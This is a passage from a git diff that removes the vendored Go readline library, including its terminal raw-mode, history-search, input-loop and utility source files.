-} - -func (Runes) WidthAll(r []rune) (length int) { - for i := 0; i < len(r); i++ { - length += runes.Width(r[i]) - } - return -} - -func (Runes) Backspace(r []rune) []byte { - return bytes.Repeat([]byte{'\b'}, runes.WidthAll(r)) -} - -func (Runes) Copy(r []rune) []rune { - n := make([]rune, len(r)) - copy(n, r) - return n -} - -func (Runes) HasPrefixFold(r, prefix []rune) bool { - if len(r) < len(prefix) { - return false - } - return runes.EqualFold(r[:len(prefix)], prefix) -} - -func (Runes) HasPrefix(r, prefix []rune) bool { - if len(r) < len(prefix) { - return false - } - return runes.Equal(r[:len(prefix)], prefix) -} - -func (Runes) Aggregate(candicate [][]rune) (same []rune, size int) { - for i := 0; i < len(candicate[0]); i++ { - for j := 0; j < len(candicate)-1; j++ { - if i >= len(candicate[j]) || i >= len(candicate[j+1]) { - goto aggregate - } - if candicate[j][i] != candicate[j+1][i] { - goto aggregate - } - } - size = i + 1 - } -aggregate: - if size > 0 { - same = runes.Copy(candicate[0][:size]) - for i := 0; i < len(candicate); i++ { - n := runes.Copy(candicate[i]) - copy(n, n[size:]) - candicate[i] = n[:len(n)-size] - } - } - return -} - -func (Runes) TrimSpaceLeft(in []rune) []rune { - firstIndex := len(in) - for i, r := range in { - if unicode.IsSpace(r) == false { - firstIndex = i - break - } - } - return in[firstIndex:] -} diff --git a/vendor/github.com/chzyer/readline/search.go b/vendor/github.com/chzyer/readline/search.go deleted file mode 100644 index 52e8ff09..00000000 --- a/vendor/github.com/chzyer/readline/search.go +++ /dev/null @@ -1,164 +0,0 @@ -package readline - -import ( - "bytes" - "container/list" - "fmt" - "io" -) - -const ( - S_STATE_FOUND = iota - S_STATE_FAILING -) - -const ( - S_DIR_BCK = iota - S_DIR_FWD -) - -type opSearch struct { - inMode bool - state int - dir int - source *list.Element - w io.Writer - buf *RuneBuffer - data []rune - history *opHistory - cfg *Config - markStart int - markEnd int - width int -} - -func newOpSearch(w io.Writer, buf *RuneBuffer, history *opHistory, cfg *Config, width int) *opSearch { - return &opSearch{ - w: w, - buf: buf, - cfg: cfg, - history: history, - width: width, - } -} - -func (o *opSearch) OnWidthChange(newWidth int) { - o.width = newWidth -} - -func (o *opSearch) IsSearchMode() bool { - return o.inMode -} - -func (o *opSearch) SearchBackspace() { - if len(o.data) > 0 { - o.data = o.data[:len(o.data)-1] - o.search(true) - } -} - -func (o *opSearch) findHistoryBy(isNewSearch bool) (int, *list.Element) { - if o.dir == S_DIR_BCK { - return o.history.FindBck(isNewSearch, o.data, o.buf.idx) - } - return o.history.FindFwd(isNewSearch, o.data, o.buf.idx) -} - -func (o *opSearch) search(isChange bool) bool { - if len(o.data) == 0 { - o.state = S_STATE_FOUND - o.SearchRefresh(-1) - return true - } - idx, elem := o.findHistoryBy(isChange) - if elem == nil { - o.SearchRefresh(-2) - return false - } - o.history.current = elem - - item := o.history.showItem(o.history.current.Value) - start, end := 0, 0 - if o.dir == S_DIR_BCK { - start, end = idx, idx+len(o.data) - } else { - start, end = idx, idx+len(o.data) - idx += len(o.data) - } - o.buf.SetWithIdx(idx, item) - o.markStart, o.markEnd = start, end - o.SearchRefresh(idx) - return true -} - -func (o *opSearch) SearchChar(r rune) { - o.data = append(o.data, r) - o.search(true) -} - -func (o *opSearch) SearchMode(dir int) bool { - if o.width == 0 { - return false - } - alreadyInMode := o.inMode - o.inMode = true - o.dir = dir - o.source = o.history.current - if 
alreadyInMode { - o.search(false) - } else { - o.SearchRefresh(-1) - } - return true -} - -func (o *opSearch) ExitSearchMode(revert bool) { - if revert { - o.history.current = o.source - o.buf.Set(o.history.showItem(o.history.current.Value)) - } - o.markStart, o.markEnd = 0, 0 - o.state = S_STATE_FOUND - o.inMode = false - o.source = nil - o.data = nil -} - -func (o *opSearch) SearchRefresh(x int) { - if x == -2 { - o.state = S_STATE_FAILING - } else if x >= 0 { - o.state = S_STATE_FOUND - } - if x < 0 { - x = o.buf.idx - } - x = o.buf.CurrentWidth(x) - x += o.buf.PromptLen() - x = x % o.width - - if o.markStart > 0 { - o.buf.SetStyle(o.markStart, o.markEnd, "4") - } - - lineCnt := o.buf.CursorLineCount() - buf := bytes.NewBuffer(nil) - buf.Write(bytes.Repeat([]byte("\n"), lineCnt)) - buf.WriteString("\033[J") - if o.state == S_STATE_FAILING { - buf.WriteString("failing ") - } - if o.dir == S_DIR_BCK { - buf.WriteString("bck") - } else if o.dir == S_DIR_FWD { - buf.WriteString("fwd") - } - buf.WriteString("-i-search: ") - buf.WriteString(string(o.data)) // keyword - buf.WriteString("\033[4m \033[0m") // _ - fmt.Fprintf(buf, "\r\033[%dA", lineCnt) // move prev - if x > 0 { - fmt.Fprintf(buf, "\033[%dC", x) // move forward - } - o.w.Write(buf.Bytes()) -} diff --git a/vendor/github.com/chzyer/readline/std.go b/vendor/github.com/chzyer/readline/std.go deleted file mode 100644 index e0c55ee9..00000000 --- a/vendor/github.com/chzyer/readline/std.go +++ /dev/null @@ -1,133 +0,0 @@ -package readline - -import ( - "io" - "os" - "sync" - "sync/atomic" -) - -var ( - Stdin io.ReadCloser = os.Stdin - Stdout io.WriteCloser = os.Stdout - Stderr io.WriteCloser = os.Stderr -) - -var ( - std *Instance - stdOnce sync.Once -) - -// global instance will not submit history automatic -func getInstance() *Instance { - stdOnce.Do(func() { - std, _ = NewEx(&Config{ - DisableAutoSaveHistory: true, - }) - }) - return std -} - -// let readline load history from filepath -// and try to persist history into disk -// set fp to "" to prevent readline persisting history to disk -// so the `AddHistory` will return nil error forever. 
-func SetHistoryPath(fp string) { - ins := getInstance() - cfg := ins.Config.Clone() - cfg.HistoryFile = fp - ins.SetConfig(cfg) -} - -// set auto completer to global instance -func SetAutoComplete(completer AutoCompleter) { - ins := getInstance() - cfg := ins.Config.Clone() - cfg.AutoComplete = completer - ins.SetConfig(cfg) -} - -// add history to global instance manually -// raise error only if `SetHistoryPath` is set with a non-empty path -func AddHistory(content string) error { - ins := getInstance() - return ins.SaveHistory(content) -} - -func Password(prompt string) ([]byte, error) { - ins := getInstance() - return ins.ReadPassword(prompt) -} - -// readline with global configs -func Line(prompt string) (string, error) { - ins := getInstance() - ins.SetPrompt(prompt) - return ins.Readline() -} - -type CancelableStdin struct { - r io.Reader - mutex sync.Mutex - stop chan struct{} - closed int32 - notify chan struct{} - data []byte - read int - err error -} - -func NewCancelableStdin(r io.Reader) *CancelableStdin { - c := &CancelableStdin{ - r: r, - notify: make(chan struct{}), - stop: make(chan struct{}), - } - go c.ioloop() - return c -} - -func (c *CancelableStdin) ioloop() { -loop: - for { - select { - case <-c.notify: - c.read, c.err = c.r.Read(c.data) - select { - case c.notify <- struct{}{}: - case <-c.stop: - break loop - } - case <-c.stop: - break loop - } - } -} - -func (c *CancelableStdin) Read(b []byte) (n int, err error) { - c.mutex.Lock() - defer c.mutex.Unlock() - if atomic.LoadInt32(&c.closed) == 1 { - return 0, io.EOF - } - - c.data = b - select { - case c.notify <- struct{}{}: - case <-c.stop: - return 0, io.EOF - } - select { - case <-c.notify: - return c.read, c.err - case <-c.stop: - return 0, io.EOF - } -} - -func (c *CancelableStdin) Close() error { - if atomic.CompareAndSwapInt32(&c.closed, 0, 1) { - close(c.stop) - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/std_windows.go b/vendor/github.com/chzyer/readline/std_windows.go deleted file mode 100644 index b10f91bc..00000000 --- a/vendor/github.com/chzyer/readline/std_windows.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build windows - -package readline - -func init() { - Stdin = NewRawReader() - Stdout = NewANSIWriter(Stdout) - Stderr = NewANSIWriter(Stderr) -} diff --git a/vendor/github.com/chzyer/readline/term.go b/vendor/github.com/chzyer/readline/term.go deleted file mode 100644 index 133993ca..00000000 --- a/vendor/github.com/chzyer/readline/term.go +++ /dev/null @@ -1,123 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd solaris - -// Package terminal provides support functions for dealing with terminals, as -// commonly found on UNIX systems. -// -// Putting a terminal into raw mode is the most common requirement: -// -// oldState, err := terminal.MakeRaw(0) -// if err != nil { -// panic(err) -// } -// defer terminal.Restore(0, oldState) -package readline - -import ( - "io" - "syscall" -) - -// State contains the state of a terminal. -type State struct { - termios Termios -} - -// IsTerminal returns true if the given file descriptor is a terminal. -func IsTerminal(fd int) bool { - _, err := getTermios(fd) - return err == nil -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. 
-func MakeRaw(fd int) (*State, error) { - var oldState State - - if termios, err := getTermios(fd); err != nil { - return nil, err - } else { - oldState.termios = *termios - } - - newState := oldState.termios - // This attempts to replicate the behaviour documented for cfmakeraw in - // the termios(3) manpage. - newState.Iflag &^= syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON - // newState.Oflag &^= syscall.OPOST - newState.Lflag &^= syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN - newState.Cflag &^= syscall.CSIZE | syscall.PARENB - newState.Cflag |= syscall.CS8 - - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - return &oldState, setTermios(fd, &newState) -} - -// GetState returns the current state of a terminal which may be useful to -// restore the terminal after a signal. -func GetState(fd int) (*State, error) { - termios, err := getTermios(fd) - if err != nil { - return nil, err - } - - return &State{termios: *termios}, nil -} - -// Restore restores the terminal connected to the given file descriptor to a -// previous state. -func restoreTerm(fd int, state *State) error { - return setTermios(fd, &state.termios) -} - -// ReadPassword reads a line of input from a terminal without local echo. This -// is commonly used for inputting passwords and other sensitive data. The slice -// returned does not include the \n. -func ReadPassword(fd int) ([]byte, error) { - oldState, err := getTermios(fd) - if err != nil { - return nil, err - } - - newState := oldState - newState.Lflag &^= syscall.ECHO - newState.Lflag |= syscall.ICANON | syscall.ISIG - newState.Iflag |= syscall.ICRNL - if err := setTermios(fd, newState); err != nil { - return nil, err - } - - defer func() { - setTermios(fd, oldState) - }() - - var buf [16]byte - var ret []byte - for { - n, err := syscall.Read(fd, buf[:]) - if err != nil { - return nil, err - } - if n == 0 { - if len(ret) == 0 { - return nil, io.EOF - } - break - } - if buf[n-1] == '\n' { - n-- - } - ret = append(ret, buf[:n]...) - if n < len(buf) { - break - } - } - - return ret, nil -} diff --git a/vendor/github.com/chzyer/readline/term_bsd.go b/vendor/github.com/chzyer/readline/term_bsd.go deleted file mode 100644 index 68b56ea6..00000000 --- a/vendor/github.com/chzyer/readline/term_bsd.go +++ /dev/null @@ -1,29 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd netbsd openbsd - -package readline - -import ( - "syscall" - "unsafe" -) - -func getTermios(fd int) (*Termios, error) { - termios := new(Termios) - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), syscall.TIOCGETA, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return nil, err - } - return termios, nil -} - -func setTermios(fd int, termios *Termios) error { - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), syscall.TIOCSETA, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return err - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/term_linux.go b/vendor/github.com/chzyer/readline/term_linux.go deleted file mode 100644 index e3392b4a..00000000 --- a/vendor/github.com/chzyer/readline/term_linux.go +++ /dev/null @@ -1,33 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. 
-// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package readline - -import ( - "syscall" - "unsafe" -) - -// These constants are declared here, rather than importing -// them from the syscall package as some syscall packages, even -// on linux, for example gccgo, do not declare them. -const ioctlReadTermios = 0x5401 // syscall.TCGETS -const ioctlWriteTermios = 0x5402 // syscall.TCSETS - -func getTermios(fd int) (*Termios, error) { - termios := new(Termios) - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlReadTermios, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return nil, err - } - return termios, nil -} - -func setTermios(fd int, termios *Termios) error { - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlWriteTermios, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return err - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/term_solaris.go b/vendor/github.com/chzyer/readline/term_solaris.go deleted file mode 100644 index 4c27273c..00000000 --- a/vendor/github.com/chzyer/readline/term_solaris.go +++ /dev/null @@ -1,32 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build solaris - -package readline - -import "golang.org/x/sys/unix" - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (int, int, error) { - ws, err := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ) - if err != nil { - return 0, 0, err - } - return int(ws.Col), int(ws.Row), nil -} - -type Termios unix.Termios - -func getTermios(fd int) (*Termios, error) { - termios, err := unix.IoctlGetTermios(fd, unix.TCGETS) - if err != nil { - return nil, err - } - return (*Termios)(termios), nil -} - -func setTermios(fd int, termios *Termios) error { - return unix.IoctlSetTermios(fd, unix.TCSETSF, (*unix.Termios)(termios)) -} diff --git a/vendor/github.com/chzyer/readline/term_unix.go b/vendor/github.com/chzyer/readline/term_unix.go deleted file mode 100644 index d3ea2424..00000000 --- a/vendor/github.com/chzyer/readline/term_unix.go +++ /dev/null @@ -1,24 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd - -package readline - -import ( - "syscall" - "unsafe" -) - -type Termios syscall.Termios - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (int, int, error) { - var dimensions [4]uint16 - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(&dimensions)), 0, 0, 0) - if err != 0 { - return 0, 0, err - } - return int(dimensions[1]), int(dimensions[0]), nil -} diff --git a/vendor/github.com/chzyer/readline/term_windows.go b/vendor/github.com/chzyer/readline/term_windows.go deleted file mode 100644 index 1290e00b..00000000 --- a/vendor/github.com/chzyer/readline/term_windows.go +++ /dev/null @@ -1,171 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build windows - -// Package terminal provides support functions for dealing with terminals, as -// commonly found on UNIX systems. 
-// -// Putting a terminal into raw mode is the most common requirement: -// -// oldState, err := terminal.MakeRaw(0) -// if err != nil { -// panic(err) -// } -// defer terminal.Restore(0, oldState) -package readline - -import ( - "io" - "syscall" - "unsafe" -) - -const ( - enableLineInput = 2 - enableEchoInput = 4 - enableProcessedInput = 1 - enableWindowInput = 8 - enableMouseInput = 16 - enableInsertMode = 32 - enableQuickEditMode = 64 - enableExtendedFlags = 128 - enableAutoPosition = 256 - enableProcessedOutput = 1 - enableWrapAtEolOutput = 2 -) - -var kernel32 = syscall.NewLazyDLL("kernel32.dll") - -var ( - procGetConsoleMode = kernel32.NewProc("GetConsoleMode") - procSetConsoleMode = kernel32.NewProc("SetConsoleMode") - procGetConsoleScreenBufferInfo = kernel32.NewProc("GetConsoleScreenBufferInfo") -) - -type ( - coord struct { - x short - y short - } - smallRect struct { - left short - top short - right short - bottom short - } - consoleScreenBufferInfo struct { - size coord - cursorPosition coord - attributes word - window smallRect - maximumWindowSize coord - } -) - -type State struct { - mode uint32 -} - -// IsTerminal returns true if the given file descriptor is a terminal. -func IsTerminal(fd int) bool { - var st uint32 - r, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - return r != 0 && e == 0 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd int) (*State, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - raw := st &^ (enableEchoInput | enableProcessedInput | enableLineInput | enableProcessedOutput) - _, _, e = syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(raw), 0) - if e != 0 { - return nil, error(e) - } - return &State{st}, nil -} - -// GetState returns the current state of a terminal which may be useful to -// restore the terminal after a signal. -func GetState(fd int) (*State, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - return &State{st}, nil -} - -// Restore restores the terminal connected to the given file descriptor to a -// previous state. -func restoreTerm(fd int, state *State) error { - _, _, err := syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(state.mode), 0) - return err -} - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (width, height int, err error) { - var info consoleScreenBufferInfo - _, _, e := syscall.Syscall(procGetConsoleScreenBufferInfo.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&info)), 0) - if e != 0 { - return 0, 0, error(e) - } - return int(info.size.x), int(info.size.y), nil -} - -// ReadPassword reads a line of input from a terminal without local echo. This -// is commonly used for inputting passwords and other sensitive data. The slice -// returned does not include the \n. 
-func ReadPassword(fd int) ([]byte, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - old := st - - st &^= (enableEchoInput) - st |= (enableProcessedInput | enableLineInput | enableProcessedOutput) - _, _, e = syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(st), 0) - if e != 0 { - return nil, error(e) - } - - defer func() { - syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(old), 0) - }() - - var buf [16]byte - var ret []byte - for { - n, err := syscall.Read(syscall.Handle(fd), buf[:]) - if err != nil { - return nil, err - } - if n == 0 { - if len(ret) == 0 { - return nil, io.EOF - } - break - } - if buf[n-1] == '\n' { - n-- - } - if n > 0 && buf[n-1] == '\r' { - n-- - } - ret = append(ret, buf[:n]...) - if n < len(buf) { - break - } - } - - return ret, nil -} diff --git a/vendor/github.com/chzyer/readline/terminal.go b/vendor/github.com/chzyer/readline/terminal.go deleted file mode 100644 index 80147122..00000000 --- a/vendor/github.com/chzyer/readline/terminal.go +++ /dev/null @@ -1,232 +0,0 @@ -package readline - -import ( - "bufio" - "fmt" - "io" - "strings" - "sync" - "sync/atomic" -) - -type Terminal struct { - m sync.Mutex - cfg *Config - outchan chan rune - closed int32 - stopChan chan struct{} - kickChan chan struct{} - wg sync.WaitGroup - isReading int32 - sleeping int32 - - sizeChan chan string -} - -func NewTerminal(cfg *Config) (*Terminal, error) { - if err := cfg.Init(); err != nil { - return nil, err - } - t := &Terminal{ - cfg: cfg, - kickChan: make(chan struct{}, 1), - outchan: make(chan rune), - stopChan: make(chan struct{}, 1), - sizeChan: make(chan string, 1), - } - - go t.ioloop() - return t, nil -} - -// SleepToResume will sleep myself, and return only if I'm resumed. 
-func (t *Terminal) SleepToResume() { - if !atomic.CompareAndSwapInt32(&t.sleeping, 0, 1) { - return - } - defer atomic.StoreInt32(&t.sleeping, 0) - - t.ExitRawMode() - ch := WaitForResume() - SuspendMe() - <-ch - t.EnterRawMode() -} - -func (t *Terminal) EnterRawMode() (err error) { - return t.cfg.FuncMakeRaw() -} - -func (t *Terminal) ExitRawMode() (err error) { - return t.cfg.FuncExitRaw() -} - -func (t *Terminal) Write(b []byte) (int, error) { - return t.cfg.Stdout.Write(b) -} - -type termSize struct { - left int - top int -} - -func (t *Terminal) GetOffset(f func(offset string)) { - go func() { - f(<-t.sizeChan) - }() - t.Write([]byte("\033[6n")) -} - -func (t *Terminal) Print(s string) { - fmt.Fprintf(t.cfg.Stdout, "%s", s) -} - -func (t *Terminal) PrintRune(r rune) { - fmt.Fprintf(t.cfg.Stdout, "%c", r) -} - -func (t *Terminal) Readline() *Operation { - return NewOperation(t, t.cfg) -} - -// return rune(0) if meet EOF -func (t *Terminal) ReadRune() rune { - ch, ok := <-t.outchan - if !ok { - return rune(0) - } - return ch -} - -func (t *Terminal) IsReading() bool { - return atomic.LoadInt32(&t.isReading) == 1 -} - -func (t *Terminal) KickRead() { - select { - case t.kickChan <- struct{}{}: - default: - } -} - -func (t *Terminal) ioloop() { - t.wg.Add(1) - defer func() { - t.wg.Done() - close(t.outchan) - }() - - var ( - isEscape bool - isEscapeEx bool - expectNextChar bool - ) - - buf := bufio.NewReader(t.getStdin()) - for { - if !expectNextChar { - atomic.StoreInt32(&t.isReading, 0) - select { - case <-t.kickChan: - atomic.StoreInt32(&t.isReading, 1) - case <-t.stopChan: - return - } - } - expectNextChar = false - r, _, err := buf.ReadRune() - if err != nil { - if strings.Contains(err.Error(), "interrupted system call") { - expectNextChar = true - continue - } - break - } - - if isEscape { - isEscape = false - if r == CharEscapeEx { - expectNextChar = true - isEscapeEx = true - continue - } - r = escapeKey(r, buf) - } else if isEscapeEx { - isEscapeEx = false - if key := readEscKey(r, buf); key != nil { - r = escapeExKey(key) - // offset - if key.typ == 'R' { - if _, _, ok := key.Get2(); ok { - select { - case t.sizeChan <- key.attr: - default: - } - } - expectNextChar = true - continue - } - } - if r == 0 { - expectNextChar = true - continue - } - } - - expectNextChar = true - switch r { - case CharEsc: - if t.cfg.VimMode { - t.outchan <- r - break - } - isEscape = true - case CharInterrupt, CharEnter, CharCtrlJ, CharDelete: - expectNextChar = false - fallthrough - default: - t.outchan <- r - } - } - -} - -func (t *Terminal) Bell() { - fmt.Fprintf(t, "%c", CharBell) -} - -func (t *Terminal) Close() error { - if atomic.SwapInt32(&t.closed, 1) != 0 { - return nil - } - if closer, ok := t.cfg.Stdin.(io.Closer); ok { - closer.Close() - } - close(t.stopChan) - t.wg.Wait() - return t.ExitRawMode() -} - -func (t *Terminal) GetConfig() *Config { - t.m.Lock() - cfg := *t.cfg - t.m.Unlock() - return &cfg -} - -func (t *Terminal) getStdin() io.Reader { - t.m.Lock() - r := t.cfg.Stdin - t.m.Unlock() - return r -} - -func (t *Terminal) SetConfig(c *Config) error { - if err := c.Init(); err != nil { - return err - } - t.m.Lock() - t.cfg = c - t.m.Unlock() - return nil -} diff --git a/vendor/github.com/chzyer/readline/utils.go b/vendor/github.com/chzyer/readline/utils.go deleted file mode 100644 index 670736b3..00000000 --- a/vendor/github.com/chzyer/readline/utils.go +++ /dev/null @@ -1,276 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "container/list" - "fmt" - "os" - "strconv" - 
"strings" - "sync" - "time" - "unicode" -) - -var ( - isWindows = false -) - -const ( - CharLineStart = 1 - CharBackward = 2 - CharInterrupt = 3 - CharDelete = 4 - CharLineEnd = 5 - CharForward = 6 - CharBell = 7 - CharCtrlH = 8 - CharTab = 9 - CharCtrlJ = 10 - CharKill = 11 - CharCtrlL = 12 - CharEnter = 13 - CharNext = 14 - CharPrev = 16 - CharBckSearch = 18 - CharFwdSearch = 19 - CharTranspose = 20 - CharCtrlU = 21 - CharCtrlW = 23 - CharCtrlZ = 26 - CharEsc = 27 - CharEscapeEx = 91 - CharBackspace = 127 -) - -const ( - MetaBackward rune = -iota - 1 - MetaForward - MetaDelete - MetaBackspace - MetaTranspose -) - -// WaitForResume need to call before current process got suspend. -// It will run a ticker until a long duration is occurs, -// which means this process is resumed. -func WaitForResume() chan struct{} { - ch := make(chan struct{}) - var wg sync.WaitGroup - wg.Add(1) - go func() { - ticker := time.NewTicker(10 * time.Millisecond) - t := time.Now() - wg.Done() - for { - now := <-ticker.C - if now.Sub(t) > 100*time.Millisecond { - break - } - t = now - } - ticker.Stop() - ch <- struct{}{} - }() - wg.Wait() - return ch -} - -func Restore(fd int, state *State) error { - err := restoreTerm(fd, state) - if err != nil { - // errno 0 means everything is ok :) - if err.Error() == "errno 0" { - return nil - } else { - return err - } - } - return nil -} - -func IsPrintable(key rune) bool { - isInSurrogateArea := key >= 0xd800 && key <= 0xdbff - return key >= 32 && !isInSurrogateArea -} - -// translate Esc[X -func escapeExKey(key *escapeKeyPair) rune { - var r rune - switch key.typ { - case 'D': - r = CharBackward - case 'C': - r = CharForward - case 'A': - r = CharPrev - case 'B': - r = CharNext - case 'H': - r = CharLineStart - case 'F': - r = CharLineEnd - case '~': - if key.attr == "3" { - r = CharDelete - } - default: - } - return r -} - -type escapeKeyPair struct { - attr string - typ rune -} - -func (e *escapeKeyPair) Get2() (int, int, bool) { - sp := strings.Split(e.attr, ";") - if len(sp) < 2 { - return -1, -1, false - } - s1, err := strconv.Atoi(sp[0]) - if err != nil { - return -1, -1, false - } - s2, err := strconv.Atoi(sp[1]) - if err != nil { - return -1, -1, false - } - return s1, s2, true -} - -func readEscKey(r rune, reader *bufio.Reader) *escapeKeyPair { - p := escapeKeyPair{} - buf := bytes.NewBuffer(nil) - for { - if r == ';' { - } else if unicode.IsNumber(r) { - } else { - p.typ = r - break - } - buf.WriteRune(r) - r, _, _ = reader.ReadRune() - } - p.attr = buf.String() - return &p -} - -// translate EscX to Meta+X -func escapeKey(r rune, reader *bufio.Reader) rune { - switch r { - case 'b': - r = MetaBackward - case 'f': - r = MetaForward - case 'd': - r = MetaDelete - case CharTranspose: - r = MetaTranspose - case CharBackspace: - r = MetaBackspace - case 'O': - d, _, _ := reader.ReadRune() - switch d { - case 'H': - r = CharLineStart - case 'F': - r = CharLineEnd - default: - reader.UnreadRune() - } - case CharEsc: - - } - return r -} - -func SplitByLine(start, screenWidth int, rs []rune) []string { - var ret []string - buf := bytes.NewBuffer(nil) - currentWidth := start - for _, r := range rs { - w := runes.Width(r) - currentWidth += w - buf.WriteRune(r) - if currentWidth >= screenWidth { - ret = append(ret, buf.String()) - buf.Reset() - currentWidth = 0 - } - } - ret = append(ret, buf.String()) - return ret -} - -// calculate how many lines for N character -func LineCount(screenWidth, w int) int { - r := w / screenWidth - if w%screenWidth != 0 { - r++ - } - return 
r -} - -func IsWordBreak(i rune) bool { - switch { - case i >= 'a' && i <= 'z': - case i >= 'A' && i <= 'Z': - case i >= '0' && i <= '9': - default: - return true - } - return false -} - -func GetInt(s []string, def int) int { - if len(s) == 0 { - return def - } - c, err := strconv.Atoi(s[0]) - if err != nil { - return def - } - return c -} - -type RawMode struct { - state *State -} - -func (r *RawMode) Enter() (err error) { - r.state, err = MakeRaw(GetStdin()) - return err -} - -func (r *RawMode) Exit() error { - if r.state == nil { - return nil - } - return Restore(GetStdin(), r.state) -} - -// ----------------------------------------------------------------------------- - -func sleep(n int) { - Debug(n) - time.Sleep(2000 * time.Millisecond) -} - -// print a linked list to Debug() -func debugList(l *list.List) { - idx := 0 - for e := l.Front(); e != nil; e = e.Next() { - Debug(idx, fmt.Sprintf("%+v", e.Value)) - idx++ - } -} - -// append log info to another file -func Debug(o ...interface{}) { - f, _ := os.OpenFile("debug.tmp", os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) - fmt.Fprintln(f, o...) - f.Close() -} diff --git a/vendor/github.com/chzyer/readline/utils_unix.go b/vendor/github.com/chzyer/readline/utils_unix.go deleted file mode 100644 index f88dac97..00000000 --- a/vendor/github.com/chzyer/readline/utils_unix.go +++ /dev/null @@ -1,83 +0,0 @@ -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd solaris - -package readline - -import ( - "io" - "os" - "os/signal" - "sync" - "syscall" -) - -type winsize struct { - Row uint16 - Col uint16 - Xpixel uint16 - Ypixel uint16 -} - -// SuspendMe use to send suspend signal to myself, when we in the raw mode. -// For OSX it need to send to parent's pid -// For Linux it need to send to myself -func SuspendMe() { - p, _ := os.FindProcess(os.Getppid()) - p.Signal(syscall.SIGTSTP) - p, _ = os.FindProcess(os.Getpid()) - p.Signal(syscall.SIGTSTP) -} - -// get width of the terminal -func getWidth(stdoutFd int) int { - cols, _, err := GetSize(stdoutFd) - if err != nil { - return -1 - } - return cols -} - -func GetScreenWidth() int { - w := getWidth(syscall.Stdout) - if w < 0 { - w = getWidth(syscall.Stderr) - } - return w -} - -// ClearScreen clears the console screen -func ClearScreen(w io.Writer) (int, error) { - return w.Write([]byte("\033[H")) -} - -func DefaultIsTerminal() bool { - return IsTerminal(syscall.Stdin) && (IsTerminal(syscall.Stdout) || IsTerminal(syscall.Stderr)) -} - -func GetStdin() int { - return syscall.Stdin -} - -// ----------------------------------------------------------------------------- - -var ( - widthChange sync.Once - widthChangeCallback func() -) - -func DefaultOnWidthChanged(f func()) { - widthChangeCallback = f - widthChange.Do(func() { - ch := make(chan os.Signal, 1) - signal.Notify(ch, syscall.SIGWINCH) - - go func() { - for { - _, ok := <-ch - if !ok { - break - } - widthChangeCallback() - } - }() - }) -} diff --git a/vendor/github.com/chzyer/readline/utils_windows.go b/vendor/github.com/chzyer/readline/utils_windows.go deleted file mode 100644 index 5bfa55dc..00000000 --- a/vendor/github.com/chzyer/readline/utils_windows.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build windows - -package readline - -import ( - "io" - "syscall" -) - -func SuspendMe() { -} - -func GetStdin() int { - return int(syscall.Stdin) -} - -func init() { - isWindows = true -} - -// get width of the terminal -func GetScreenWidth() int { - info, _ := GetConsoleScreenBufferInfo() - if info == nil { - return -1 - } 